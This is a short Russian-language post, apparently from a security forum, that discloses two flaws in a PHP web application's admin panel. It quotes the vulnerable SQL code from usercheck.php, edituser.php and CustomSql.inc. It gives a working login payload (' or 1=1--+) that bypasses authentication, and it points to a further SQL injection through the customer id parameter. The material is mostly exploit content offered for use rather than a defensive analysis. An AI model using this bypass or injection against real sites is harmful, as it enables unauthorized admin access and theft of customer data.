1) [bypass] (требования: magic_quotes=off)
не заметил, бага в паблике, но для следующей уязвимости она понадобится... admin/usercheck.php уязвимый код:
PHP код:
if (!empty($logincheck)){
$sql = "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";
эксплуатирование:
Код:
login:' or 1=1--+
2) [SQL-injection] (требования: magic_quotes=off, доступ в админ панель)
/admin/edituser.php
уязвимый код:
PHP код:
<?php
$userinfo = $db->getuserinfobyid($cid);
/CustomSql.inc
PHP код:
function getuserinfobyid($customerid)
{
$sql = "select * from customer where customerid='$customerid'";
$result = $this->select($sql);
return $result;
}